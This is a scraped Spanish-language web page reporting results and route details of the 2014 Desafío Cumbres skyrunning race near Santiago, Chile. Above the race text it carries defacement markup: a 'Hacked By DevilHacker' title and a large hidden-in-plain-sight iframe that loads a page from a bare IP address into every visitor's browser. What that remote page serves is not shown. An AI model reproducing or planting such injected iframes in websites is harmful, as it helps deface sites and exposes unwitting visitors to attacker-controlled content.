<title>Hacked By DevilHacker</title>
<div dir="rtl" style="text-align: right;" trbidi="on">


<center><iframe height="1000" src="http://131.72.236.68/~ahumadod/index.php" width="1300"></iframe></div></center>


</div>

Felicitamos a los 32 corredores que participaron de esta difícil prueba!

DSC_0129

Muchos participaban por segunda vez y varios se sumaron por primera vez a este gran desafío.

El recorrido de 4 cumbres y un total de 24 km de distancia fue completado en 03:41:07 hrs. por Nil Bacardit, un jóven Catalán de tan solo 21 años que logró batir el record de la travesía, además de quedarse con el menor tiempo en llegar a la Cumbre de “La Leonera” con 02:10:00 hrs. En segundo lugar quedo el atleta estadounidense de Mountain Hardwear, Max King, invitado especial, quién cumplió todas las etapas en 03:55:36. El tercer Puesto se lo llevó nuestro compatriota Leonardo Gallardo con un tiempo final de 04:10:16 hrs. En mujeres la más rápida fue Florencia Marinovic, quién completó el recorrido con un tiempo de 04:42:40 hrs, mientras que la más rápida a la cumbre del cerro Leonera fue Marlene Flores con un tiempo de 02:38:10 hrs.

FIO_0071 (Copiar)

A continuación podrán revivir un poco de lo que fue este gran evento que logró convocar a mas de un centenar de personas, la mayoría entusiastas espectadores, familiares y amigos de los corredores, todos apoyando y participando de este acontecimiento tan importante para el mundo de montaña.

Juan Luís De Heeckeren

Francisco Ibarra

Matías Pinto

Paolo Ávila

Cindy Meneses

Videos Desafío Cumbres 2014

“La otra perspectiva”  Una mirada más profunda a través de los mismos corredores y equipo de trabajo del evento.

“La Carrera”   Revive esta increíble carrera en unos pocos minutos de acción

___________________________________________________________________

Ruta

El Desafío Cumbres Mountain Hardwear es una competencia inédita en nuestro país que se realiza en el contexto de una carrera cronometrada en alta montaña, alcanzando cumbres de hasta 4.950 mts de altura. Esta nueva disciplina es la fusión entre el montañismo y el running, una carrera que lleva a los atletas al límite, en donde el objetivo no será solo el de completar un recorrido, sino que además el de alcanzar las cumbres en el menor tiempo posible.

Esta es una competencia de carácter invitacional, exclusiva y del más alto nivel, por lo tanto solo 20 corredores serán invitados a participar. Además este año por primera vez se abrirán 30 cupos extras para quienes quieran postular, clasificando a través de sus currículums y logros deportivos, por lo tanto solo participarán 50 corredores en total.

Esta modalidad de competencia incluye a montañistas y runners destacados tanto en Chile como el extranjero, principalmente atletas muy potentes que sobresalen en las disciplinas de trailrunning y montañismo.

DATOS GENERALES

Fecha:                              Sábado 19 de abril
Disciplina:                      Skyrunning
Distancia/Desnivel:     24 Km/2.000 Mts.
Partida/Meta:               Laguna Franciscano, Valle Nevado, Lo Barnechea, Santiago de Chile
Categorías:                    Elite invitacional
Corredores:                   50 max.

VIDEO DESAFIO CUMBRES 2013